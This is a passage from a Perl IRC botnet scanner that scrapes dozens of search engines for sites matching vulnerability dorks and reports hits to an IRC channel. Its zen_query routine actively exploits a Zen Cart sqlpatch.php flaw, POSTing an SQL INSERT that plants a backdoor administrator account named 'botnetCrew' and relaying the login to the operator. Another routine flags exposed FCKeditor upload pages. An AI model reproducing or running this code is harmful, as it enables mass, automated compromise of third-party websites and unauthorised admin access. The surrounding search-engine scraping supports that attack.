2268. &msg("$chan", "$admlogo(4@12$engine11,1)(4@3VulN11,1)3 ".$vuln."11,1(4@0OKE11,1)");
2269. }
2270. }
2271. }
2272. }
2273.  
2274. sub op() {
2275. my $chan = $_[0];
2276. my $bug = $_[1];
2277. my $dork = $_[2];
2278. my $engine = $_[3];
2279. my $count = 0;
2280. my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
2281. my $num = scalar(@list);
2282. if ($num > 0) {
2283. foreach my $site (@list) {
2284. $count++;
2285. if ($count == $num-1) { &msg("$chan","$oplogo(4@12$engine11,1)10 Scan finish"); }
2286. my $test = "http://".$site.$open_test;
2287. my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
2288. my $re = &get_content($test);
2289. if ($re =~ /$open_output/){
2290. &msg("$chan", "$oplogo(4@12$engine11,1)(4@3VulN11,1)3 ".$vuln."11,1(4@0UPLOAD11,1)");
2291. }
2292. }
2293. }
2294. }
2295.  
2296. sub zen() {
2297. my $chan = $_[0];
2298. my $bug = $_[1];
2299. my $dork = $_[2];
2300. my $engine = $_[3];
2301. my $count = 0;
2302. my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
2303. my $num = scalar(@list);
2304. if ($num > 0) {
2305. foreach my $site (@list) {
2306. $count++;
2307. if ($count == $num-1) { &msg("$chan","$zenlogo(4@12$engine11,1)10 Scan finish"); }
2308. my $test = "http://".$site."admin/sqlpatch.php/password_forgotten.php?action=execute";
2309. my $html = &get_content($test);
2310. if ($html =~ /zc_install/){
2311. &zen_query($chan,$site,$test);
2312. }
2313. }
2314. }
2315. }
2316.  
2317. sub zen_query() {
2318. my $chan = $_[0];
2319. my $url = $_[1];
2320. my $test = $_[2];
2321. my $code = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (313,'botnetCrew','danexscrew@yahoo.com','617ec22fbb8f201c366e9848c0eb6925:87');";
2322. my $req = HTTP::Request->new(POST => $test);
2323. $req->content_type("application/x-www-form-urlencoded");
2324. $req->content("query_string=".$code);
2325. my $ua = LWP::UserAgent->new(agent => $uagent);
2326. $ua->timeout(3);
2327. my $res = $ua->request($req);
2328. my $data = $res->as_string;
2329. if ( $data =~ /1 statements processed/i ) {
2330. my $shell = "http://".$url."4admin/login.php 11,1(4@9user11,1)0 botnetCrew 11,1(4@9pass11,1)0 wew";
2331. for my $t (@{$shell}) {
2332. push @{ $found }, $t;
2333. }
2334. &msg("$chan","$zenlogo(4@9VulN11,1)13 http://".$url."4admin/login.php 11,1(4@9user11,1)0 botnetCrew 11,1(4@9pass11,1)0 wew");
2335. }
2336. elsif ( $data =~ /Duplicate entry/ ) {
2337. my $shell = "http://".$url."4admin/login.php 11,1(4@9user11,1)0 botnetCrew 11,1(4@9pass11,1)0 wew";
2338. for my $t (@{$shell}) {
2339. push @{ $found }, $t;
2340. }
2341. &msg("$chan","$zenlogo(4@9SuCcEs11,1)13 http://".$url."3admin/login.php 11,1(4@9user11,1)4 botnetCrew 11,1(4@9pass11,1)4 wew87");
2342. &msg("$admin","$zenlogo(4@9SuCcEs11,1)13 http://".$url."3admin/login.php 11,1(4@9user11,1)4 botnetCrew 11,1(4@9pass11,1)4 wew87");
2343. }
2344. }
2345. #########################################
2346.  
2347. sub search_engine() {
2348. my (@total,@clean);
2349. my $chan = $_[0];
2350. my $bug = $_[1];
2351. my $dork = $_[2];
2352. my $engine = $_[3];
2353. my $logo = $_[4];
2354. if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
2355. if ($engine eq "ReDiff") { my @rediff = &rediff($dork); push(@total,@rediff); }
2356. if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
2357. if ($engine eq "ALtaViSTa") { my @altavista = &altavista($dork); push(@total,@altavista); }
2358. if ($engine eq "YahOo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
2359. if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
2360. if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
2361. if ($engine eq "CluSty") { my @clusty = &clusty($dork); push(@total,@clusty); }
2362. if ($engine eq "GutSer") { my @gutser = &gutser($dork); push(@total,@gutser); }
2363. if ($engine eq "GooGle2") { my @google2 = &google2($dork); push(@total,@google2); }
2364. if ($engine eq "ExaLead") { my @exalead = &exalead($dork); push(@total,@exalead); }
2365. if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
2366. if ($engine eq "VirgiLio") { my @virgilio = &virgilio($dork); push(@total,@virgilio); }
2367. if ($engine eq "WebDe") { my @webde = &webde($dork); push(@total,@webde); }
2368. if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
2369. if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
2370. if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
2371. if ($engine eq "DuCk") { my @duck = &duck($dork); push(@total,@duck); }
2372. if ($engine eq "LyGo") { my @lygo = &lygo($dork); push(@total,@lygo); }
2373. if ($engine eq "YauSe") { my @yause = &yause($dork); push(@total,@yause); }
2374. if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }
2375. if ($engine eq "KiPoT") { my @kipot = &kipot($dork); push(@total,@kipot); }
2376. if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }
2377. if ($engine eq "BLacK") { my @black = &black($dork); push(@total,@black); }
2378. if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }
2379. if ($engine eq "SiZuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }
2380. if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
2381. if ($engine eq "DeMos") { my @demos = &demos($dork); push(@total,@demos); }
2382. if ($engine eq "RoSe") { my @rose = &rose($dork); push(@total,@rose); }
2383. if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }
2384. if ($engine eq "TisCali") { my @tiscali = &tiscali($dork); push(@total,@tiscali); }
2385. if ($engine eq "NaVeR") { my @naver = &naver($dork); push(@total,@naver); }
2386. if ($engine eq "DooGatE") { my @doogate = doogate($dork); push(@total,@doogate); }
2387. if ($engine eq "sogou") { my @sogou = &sogou($dork); push(@total,@sogou); }
2388. if ($engine eq "interia") { my @interia = &interia($dork); push(@total,@interia); }
2389. if ($engine eq "snz") { my @snz = &snz($dork); push(@total,@snz); }
2390. if ($engine eq "yandex") { my @yandex = &yandex($dork); push(@total,@yandex); }
2391. if ($engine eq "joeant") { my @joeant = &joeant($dork); push(@total,@joeant); }
2392. if ($engine eq "terra") { my @terra = &terra($dork); push(@total,@terra); }
2393. if ($engine eq "youdao") { my @youdao = &youdao($dork); push(@total,@youdao); }
2394. if ($engine eq "amfibi") { my @amfibi = &amfibi($dork); push(@total,@amfibi); }
2395. if ($engine eq "bigclique") { my @bigclique = &bigclique($dork); push(@total,@bigclique); }
2396. if ($engine eq "dancefloor") { my @dancefloor = &dancefloor($dork); push(@total,@dancefloor); }
2397. if ($engine eq "live") { my @live = &live($dork); push(@total,@live); }
2398. if ($engine eq "rakuten") { my @rakuten = &rakuten($dork); push(@total,@rakuten); }
2399. if ($engine eq "biglobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }
2400. if ($engine eq "nova") { my @nova = &nova($dork); push(@total,@nova); }
2401. if ($engine eq "nadji") { my @nadji = &nadji($dork); push(@total,@nadji); }
2402. if ($engine eq "goo") { my @goo = &goo($dork); push(@total,@goo); }
2403. if ($engine eq "uksubmit") { my @uksubmit = &uksubmit($dork); push(@total,@uksubmit); }
2404. if ($engine eq "excite") { my @excite = &excite($dork); push(@total,@excite); }
2405. @clean = &clean(@total);
2406. # &msg("$chan","$logo(4@3$engine15)12 Total:0 (".scalar(@total).")4 Clean:0 (".scalar(@clean).")");
2407. return @clean;
2408. }
2409.  
2410. #########################################
2411.  
2412. sub isFound() {
2413. my $status = 0;
2414. my $link = $_[0];
2415. my $reqexp = $_[1];
2416. my $res = &get_content($link);
2417. if ($res =~ /$reqexp/) { $status = 1 }
2418. return $status;
2419. }
2420.  
2421. sub get_content() {
2422. my $url = $_[0];
2423. my $ua = LWP::UserAgent->new(agent => $uagent);
2424. $ua->timeout(7);
2425. my $req = HTTP::Request->new(GET => $url);
2426. my $res = $ua->request($req);
2427. return $res->content;
2428. }
2429.  
2430. ######################################### SEARCH ENGINE gibla
2431.  
2432. sub google() {
2433. my @list;
2434. my $key = $_[0];
2435. for (my $i=0; $i<=200; $i+=10){
2436. my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i);
2437. my $res = &search_engine_query($search);
2438. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
2439. if ($1 !~ /google/){
2440. my $link = $1;
2441. my @grep = &links($link);
2442. push(@list,@grep);
2443. }
2444. }
2445. }
2446. return @list;
2447. }
2448.  
2449. sub rediff() {
2450. my @list;
2451. my $key = $_[0];
2452. for (my $i=0; $i<=200; $i+=10) {
2453. my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($key)."&iss=&submit=Search&firstres=".$i);
2454. $b = "$i";
2455. my $res = &search_engine_query($search);
2456. if ($res !~ /firstres=$b\'>/) {$i=200;}
2457. while ($res =~ m/<a href=\"http:\/\/(.*?)\" onmousedown/g) {
2458. if ($1 !~ /rediff\.com/){
2459. my $link = $1;
2460. my @grep = &links($link);
2461. push(@list,@grep);
2462. }
2463. }
2464. }
2465. return @list;
2466. }
2467.  
2468. sub uol() {
2469. my @list;
2470. my $key = $_[0];
2471. for (my $i=1; $i<=500; $i+=10) {
2472. my $search = ("http://busca.uol.com.br/web/?q=".&key($key)."&start=&ie=iso&start=".$i);
2473. my $res = &search_engine_query($search);
2474. if ($res !~ m/<span class=\"next\">pr&#243;xima<\/span>/){$i=200;}
2475. while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
2476. if ($1 !~ /uol\.com/) {
2477. my $link = $1;
2478. my @grep = &links($link);
2479. push(@list,@grep);
2480. }
2481. }
2482. }
2483. return @list;
2484. }
2485.  
2486. sub bing() {
2487. my @list;
2488. my $key = $_[0];
2489. for (my $i=1; $i<=500; $i+=10) {
2490. my $search = ("http://www.bing.com/search?q=".&key($key)."&first=".$i."&FORM=PERE");
2491. my $res = &search_engine_query($search);
2492. if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=200;}
2493. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
2494. if ($1 !~ /bing\.com/) {
2495. my $link = $1;
2496. my @grep = &links($link);
2497. push(@list,@grep);
2498. }
2499. }
2500. }
2501. return @list;
2502. }
2503.  
2504. sub altavista() {
2505. my @list;
2506. my $key = $_[0];
2507. for (my $i=1; $i<=200; $i+=10){
2508. my $search = ("http://it.altavista.com/yhs/search?fr=altavista&itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i);
2509. my $res = &search_engine_query($search);
2510. if ($res !~ /target=\"_self\">Succ/) {$i=200;}
2511. while ($res =~ m/<span class=ngrn>(.+?)\//g) {
2512. if ($1 !~ /altavista/){
2513. my $link = $1;
2514. $link =~ s/<//g;
2515. $link =~ s/ //g;
2516. my @grep = &links($link);
2517. push(@list,@grep);
2518. }
2519. }
2520. }
2521. return @list;
2522. }
2523.  
2524. sub ask() {
2525. my @list;
2526. my $key = $_[0];
2527. for (my $i=1; $i<=50; $i+=1) {
2528. my $search = ("http://it.ask.com/web?q=".&key($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all");
2529. my $res = &search_engine_query($search);
2530. if ($res !~ /Successiva/) {$i=50;}
2531. while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {
2532. if ($1 !~ /ask\.com/){
2533. my $link = $1;
2534. my @grep = &links($link);
2535. push(@list,@grep);
2536. }
2537. }
2538. }
2539. return @list;
2540. }
2541.  
2542. sub yahoo(){
2543. my @list;
2544. my $key = $_[0];
2545. my $b = 0;
2546. for ($b=1; $b<=500; $b+=10) {
2547. my $search = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b);
2548. my $res = &search_engine_query($search);
2549. while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
2550. if ($1 !~ /yahoo\.com/){
2551. my $link = $1;
2552. my @grep = &links($link);
2553. push(@list,@grep);
2554. }
2555. }
2556. }
2557. return @list;
2558. }
2559.  
2560. sub clusty() {
2561. my @list;
2562. my $key = $_[0];
2563. my $b = 0;
2564. for ($b=10; $b<=500; $b+=10) {
2565. my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
2566. my $res = &search_engine_query($search);
2567. if ($res !~ /next/) {$b=200;}
2568. while ($res =~ m/<div class=\"document-header\"><a href=\"http:\/\/(.*?)\"><span class=\"title\">/g) {
2569. if ($1 !~ /yippy\.com/){
2570. my $link = $1;
2571. my @grep = &links($link);
2572. push(@list,@grep);
2573. }
2574. }
2575. }
2576. return @list;
2577. }
2578.  
2579. sub gutser() {
2580. my @list;
2581. my $key = $_[0];
2582. for ($b=1; $b<=500; $b+=10) {
2583. my $search = ("http://us.yhs4.search.yahoo.com/yhs/search;_ylt=A0oG7qOkbTFPVH8ARSVjmolQ?p=".&key($key)."&fr=goodsearch-yhsif&xargs=12KPjg1pZSrp68i- _oMPCRErjGnQNVmZy15JIuTcQ_QZAD6A5dYdR_ePqBypItDrUtu0KJk6nQo_pPIfL7ucu6&pstart=9&b=".$b);
2584. my $res = &search_engine_query($search);
2585. while ($res =~ m/http:\/\/([^>\"]*)\">/g) {
2586. if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){
2587. my $link = $1;
2588. my @grep = &links($link);
2589. push(@list,@grep);
2590. }
2591. }
2592. }
2593. return @list;
2594. }
2595.  
2596. sub google2() {
2597. my @list;
2598. my $key = $_[0];
2599. my $b = 0;
2600. my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","c o.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","h r","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms"," com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt ","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co .uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm","co.kr");
2601. foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
2602. for ($b=1; $b<=200; $b+=10) {
2603. my $search = ("http://www.google.".$dom."/search?num=50&q=".&key($key)."&start=".$b."&sa=N");
2604. my $res = &search_engine_query($search);
2605. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
2606. if ($1 !~ /google/){
2607. my $link = $1;
2608. my @grep = &links($link);
2609. push(@list,@grep);
2610. }
2611. }
2612. } return @list;
2613. }
2614. }
2615.  
2616. sub exalead() {
2617. my @list;
2618. my $key = $_[0];
2619. for ($b=0; $b<=1000; $b+=50) {
2620. my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)."&elements_per_page=50&start_index=".$b);
2621. my $res = &search_engine_query($search);
2622. if ($res =~ m/<span id=\"topNextUrl\">/g) {$b=1000;}
2623. while ($res =~ m/<a class=\"thumbnail\" href=\"http:\/\/(.*?)\"/g) {
2624. my $link = $1;
2625. if ($link!~ /exalead/){
2626. my @grep = &links($link);
2627. push(@list,@grep);
2628. }
2629. }
2630. }
2631. return @list;
2632. }
2633.  
2634. sub lycos() {
2635. my @list;
2636. my $key = $_[0];
2637. for ($b=0; $b<=50; $b+=1) {
2638. my $search = ("http://search.lycos.com/web?q=".&key($key)."&pn=".$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
2639. my $res = &search_engine_query($search);
2640. while ($res =~ m/href=\"http:\/\/(.+?)\" onmouseover=/g) {
2641. if ($1 !~ /lycos\.com/){
2642. my $link = $1;
2643. my @grep = &links($link);
2644. push(@list,@grep);
2645. }
2646. }
2647. }
2648. return @list;
2649. }
2650.  
2651. sub virgilio() {
2652. my @list;
2653. my $key = $_[0];
2654. for ($b=10; $b<=200; $b+=10) {
2655. my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);
2656. my $res = &search_engine_query($search);
2657. if ($res =~ m/non ha prodotto risultati/i) {$b=200;}
2658. if ($res =~ m/riconducibile a richieste effettuate/i) {$b=200;}
2659. while ($res =~ m/<a href=\"http:\/\/(.+?)\" target=\"/g) {
2660. if ($1 !~ /\.virgilio\.it/){
2661. my $link = $1;
2662. my @grep = &links($link);
2663. push(@list,@grep);
2664. }
2665. }
2666. }
2667. return @list;
2668. }
2669.  
2670. sub webde() {
2671. my @list;
2672. my $key = $_[0];
2673. for ($b=1; $b<=50; $b+=1) {
2674. my $search = ("http://suche.web.de/search/web/?pageIndex=".$b."&su=".&key($key)."&search=Suche&origin=site_hp&mc=suche@web@navigation@zahlen.suche@web");
2675. my $res = &search_engine_query($search);
2676. if ($res =~ m/Suchbegriff nicht gefunden/i) {$b=50;}
2677. while ($res =~ m/<span class=\"url\">http:\/\/(.*?)<\/span>/g) {
2678. my $link = $1;
2679. if ($link!~ /suche|web/){
2680. my @grep = &links($link);
2681. push(@list,@grep);
2682. }
2683. }
2684. }
2685. return @list;
2686. }
2687.  
2688. sub hotbot() {
2689. my @list;
2690. my $key = $_[0];
2691. for ($b=0; $b<=50; $b+=1) {
2692. my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".&key($key)."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
2693. my $res = &search_engine_query($search);
2694. if ($res =~ m/had no web result/i) {$b=50;}
2695. while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\"/g) {
2696. if ($1 !~ /hotbot\.com/){
2697. my $link = $1;
2698. my @grep = &links($link);
2699. push(@list,@grep);
2700. }
2701. }
2702. }
2703. return @list;
2704. }
2705.  
2706. sub aol() {
2707. my @list;
2708. my $key = $_[0];
2709. for ($b=2; $b<=50; $b+=1) {
2710. my $search = ("http://search.aol.com/aol/search?q=".&key($key)."&s_it=aim-port&page=".$b);
2711. my $res = &search_engine_query($search);
2712. while ($res =~ m/href=\"http:\/\/(.*?)\" property/g) {
2713. if ($1 !~ /aol\.com/){
2714. my $link = $1;
2715. my @grep = &links($link);
2716. push(@list,@grep);
2717. }
2718. }
2719. }
2720. return @list;
2721. }
2722.  
2723. sub sapo(){
2724. my @list;
2725. my $key = $_[0];
2726. for ($b=1; $b<=50; $b+=1) {
2727. my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".&key($key)."&st=local");
2728. my $res = &search_engine_query($search);
2729. if ($res !~ m/Next/i) {$b=50;}
2730. while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
2731. if ($1 !~ /\.sapo\.pt/){
2732. my $link = $1;
2733. my @grep = &links($link);
2734. push(@list,@grep);
2735. }
2736. }
2737. }
2738. return @list;
2739. }
2740.  
2741. sub duck() {
2742. my @list;
2743. my $key = $_[0];
2744. my $b = 0;
2745. for ($b=1; $b<=50; $b+=1) {
2746. my $search = ("http://duckduckgo.com/html/?q=".&key($key)."&t=A&l=en&p=1&s=".$b."&o=json&dc=".$b."&api=d.js");
2747. my $res = &search_engine_query($search);
2748. if ($res =~ m/No more results/i) {$b=50;}
2749. while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
2750. if ($1 !~ /duckduckgo/){
2751. my $link = $1;
2752. my @grep = &links($link);
2753. push(@list,@grep);
2754. }
2755. }
2756. }
2757. return @list;
2758. }
2759.  
2760. sub lygo() {
2761. my @list;
2762. my $key = $_[0];
2763. my $b = 0;
2764. for ($b=0; $b<=50; $b+=1) {
2765. my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=lygo&page2=". $b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
2766. my $res = &search_engine_query($search);
2767. if ($res =~ m/had no web result/i) {$b=50;}
2768. while ($res =~ m/<a href=\"http:\/\/(.+?)\"><img/g) {
2769. if ($1 !~ /hotbot\.com/){
2770. my $link = $1;
2771. my @grep = &links($link);
2772. push(@list,@grep);
2773. }
2774. }
2775. }
2776. return @list;
2777. }
2778.  
2779. sub yause() {
2780. my @list;
2781. my $key = $_[0];
2782. my $b = 0;
2783. for ($b=1; $b<=50; $b+=1) {
2784. my $search = ("http://www.yauba.com/?query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&pg=".$b);
2785. my $res = &search_engine_query($search);
2786. if ($res !~ m/Next/i) {$b=50;}
2787. while ($res =~ m/<h1><a rel=\"nofollow\" href=\"http:\/\/(.+?)\" onfocus=/g) {
2788. if ($1 !~ /yauba\.com/){
2789. my $link = $1;
2790. my @grep = &links($link);
2791. push(@list,@grep);
2792. }
2793. }
2794. }
2795. return @list;
2796. }
2797.  
2798. sub baidu() {
2799. my @list;
2800. my $key = $_[0];
2801. my $b = 0;
2802. for ($b=0; $b<=200; $b+=10) {
2803. my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
2804. my $res = &search_engine_query($search);
2805. while ($res =~ m/\" href=\"http:\/\/(.*?)\" target=/g) {
2806. if ($1 !~ /baidu\.com/){
2807. my $link = $1;
2808. my @grep = &links($link);
2809. push(@list,@grep);
2810. }
2811. }
2812. }
2813. return @list;
2814. }
2815.  
2816. sub kipot() {
2817. my @list;
2818. my $key = $_[0];
2819. my $b = 0;
2820. for ($b=1; $b<=50; $b+=1) {
2821. my $search = ("http://www.qkport.com/".$b."/web/".&key($key));
2822. my $res = &search_engine_query($search);
2823. while ($res =~ m/href=\"http:\/\/(.*?)\" target=\"_top\"/g) {
2824. if ($1 !~ /qkport\.com/){
2825. my $link = $1;
2826. my @grep = &links($link);
2827. push(@list,@grep);
2828. }
2829. }
2830. }
2831. return @list;
2832. }
2833.  
2834. sub gibla() {
2835. my @list;
2836. my $key = $_[0];
2837. my $hal = "/search?k8m=223945&s=10&q=".&key($key);
2838. my $search = ("http://www.gigablast.com".$hal);
2839. my $res = &search_engine_query($search);
2840. while ($res =~ m/Next 10 Results/) {
2841. $search = ("http://www.gigablast.com".$hal);
2842. while ($res =~ m/<span class=\"url\">(.+?)><\/span>/g) {
2843. my $link = $1;
2844. my @grep = &links($link);
2845. push(@list,@grep);
2846. }
2847. if ($res =~ m/<center><a href=\"(.*?)\">/) { $hal = $1; }
2848. $res = &search_engine_query($search);
2849. }return @list;
2850. }
2851.  
2852. sub black() {
2853. my @list;
2854. my $key = $_[0];
2855. my $b = 0;
2856. for ($b=0; $b<=50; $b+=1) {
2857. my $search = ("http://blekko.com/ws/".&key($key)."?p=".$b);
2858. my $cek = $b+1;
2859. my $res = &search_engine_query($search);
2860. if ($res !~ m/<strong>$b<\/strong>/i) {$b=50;}
2861. while ($res =~ m/class=\"UrlTitleLine\" href=\"http:\/\/(.+?)\"/g) {
2862. if ($1 !~ /blekko/){
2863. my $link = $1;
2864. my @grep = &links($link);
2865. push(@list,@grep);
2866. }
2867. }
2868. }
2869. return @list;
2870. }
2871.  
2872. sub onet() {
2873. my @list;
2874. my $key = $_[0];
2875. my $b = 0;
2876. for ($b=1; $b<=50; $b+=1) {
2877. my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
2878. my $res = &search_engine_query($search);
2879. while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
2880. if ($1 !~ /webcache|query/){
2881. my $link = $1;
2882. my @grep = &links($link);
2883. push(@list,@grep);
2884. }
2885. }
2886. }
2887. return @list;
2888. }
2889.  
2890. sub sizuka() {
2891. my @list;
2892. my $key = $_[0];
2893. my $b = 0;
2894. for ($b=10; $b<=100; $b+=10) {
2895. my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q=".&key($key)."&start=".$b);
2896. my $res = &search_engine_query($search);
2897. while ($res =~ m/<a title=\"http:\/\/(.+?)\"/g) {
2898. if ($1 !~ /szukacz/){
2899. my $link = $1;
2900. my @grep = &links($link);
2901. push(@list,@grep);
2902. }
2903. }
2904. }
2905. return @list;
2906. }
2907.  
2908. sub walla() {
2909. my @list;
2910. my $key = $_[0];
2911. my $b = 0;
2912. for ($b=0; $b<=50; $b+=1) {
2913. my $search = ("http://search.walla.co.il/?q=".&key($key)."&type=text&page=".$b);
2914. my $res = &search_engine_query($search);
2915. while ($res =~ m/<td class=sw><a href=\"http:\/\/(.+?)\"/g) {
2916. if ($1 !~ /walla\.co\.il/){
2917. my $link = $1;
2918. my @grep = &links($link);
2919. push(@list,@grep);
2920. }
2921. }
2922. }
2923. return @list;
2924. }
2925.  
2926. sub demos() {
2927. my @list;
2928. my $key = $_[0];
2929. my $b = 0;
2930. for ($b=0; $b<=700; $b+=20) {
2931. my $search = ("http://www.dmoz.org/search/search?q=".&key($key)."&start=".$b."&type=next&all=yes");
2932. my $res = &search_engine_query($search);
2933. while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
2934. if ($1 !~ /search|dmoz/){
2935. my $link = $1;
2936. my @grep = &links($link);
2937. push(@list,@grep);
2938. }
2939. }
2940. }
2941. return @list;
2942. }
2943.  
2944. sub rose() {
2945. my @list;
2946. my $key = $_[0];
2947. my $b = 0;
2948. my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
2949. foreach my $language (@langs) { $lang = $langs[rand(scalar(@langs))];
2950. for ($b=0; $b<=500; $b+=10) {
2951. my $search = ("http://euroseek.com/system/search.cgi?language=".$lang."&mode=internet&start=".$b."&string=".&key($key));
2952. my $res = &search_engine_query($search);
2953. while ($res =~ m/<a href=\"http:\/\/(.+?)\" class=/g) {
2954. if ($1 !~ /euroseek/){
2955. my $link = $1;
2956. my @grep = &links($link);
2957. push(@list,@grep);
2958. }
2959. }
2960. }
2961. }return @list;
2962. }
2963.  
2964. sub seznam() {
2965. my @list;
2966. my $key = $_[0];
2967. for ($b=1; $b<=200; $b+=10) {
2968. my $search = ("http://search.seznam.cz/?q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
2969. my $res = &search_engine_query($search);
2970. while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {
2971. if ($1 !~ /seznam/){
2972. my $link = $1;
2973. my @grep = &links($link);
2974. push(@list,@grep);
2975. }
2976. }
2977. }
2978. return @list;
2979. }
2980.  
2981. sub tiscali() {
2982. my @list;
2983. my $key = $_[0];
2984. for ($b=0; $b<=200; $b+=10) {
2985. my $search = ("http://search.tiscali.it/?tiscalitype=web&collection=web&start=".$b."&q=".&key($key));
2986. my $res = &search_engine_query($search);
2987. while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) {
2988. if ($1 !~ /tiscali/){
2989. my $link = $1;
2990. my @grep = &links($link);
2991. push(@list,@grep);
2992. }
2993. }
2994. }
2995. return @list;
2996. }
2997.  
2998. sub naver() {
2999. my @list;
3000. my $key = $_[0];
3001. for ($b=1; $b<=200; $b+=10) {
3002. my $search = ("http://web.search.naver.com/search.naver?where=webkr&query=".&key($key)."&docid=0&#9001;=all&f=&srcharea=all&st=s&fd=2&start=". $b."&display=10");
3003. my $res = &search_engine_query($search);
3004. while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
3005. if ($1 !~ /naver/){
3006. my $link = $1;
3007. my @grep = &links($link);
3008. push(@list,@grep);
3009. }
3010. }
3011. }
3012. return @list;
3013. }
3014.  
3015. sub doogate(){
3016. my @list;
3017. my $key = $_[0];
3018. my $i = 0;
3019. for ($i=0; $i<=1000; $i+=100){
3020. my $web=("http://www.doogate.com/search?q=".key($key)."&start=".$i);
3021. my $Res= search_engine_query($web);
3022. while ($Res =~ m/<a href=\"http:\/\/(.+?)\//g){
3023.  
3024. if ($1 !~ /doogate/){
3025. my $k=$1;
3026. my @grep=links($k);
3027. push(@list,@grep);
3028. }
3029. }
3030. }
3031. return @list;
3032. }
3033.  
3034. sub sogou() {
3035. my @list;
3036. my $key = $_[0];
3037. for (my $b=1; $b<=50; $b+=1){
3038. my $search = ("http://www.sogou.com/web?query=".&key($key)."&page=".$b);
3039. my $res = search_engine_query($search);
3040. while ($res =~ m/<a name="dttl" target="_blank" href="http:\/\/(.*?)\"/g) {
3041. my $link = $1;
3042. if ($link !~ /sogou/){
3043. my @grep = links($link);
3044. push(@list,@grep);
3045. }
3046. }
3047. }
3048. return @list;
3049. }
3050.  
3051. sub interia() {
3052. my @list;
3053. my $key = $_[0];
3054. for ($b = 0;$b<= 100; $b+= 10) {
3055. my $search = ( "http://www.google.interia.pl/szukaj,q,".&key($key).",w,,p,".$b);
3056. my $res = search_engine_query($search);
3057. while ($res =~ m/text-decoration: none;\">http:\/\/(.+?)\/(.*)<\/a>/g) {
3058. my $link = $1;
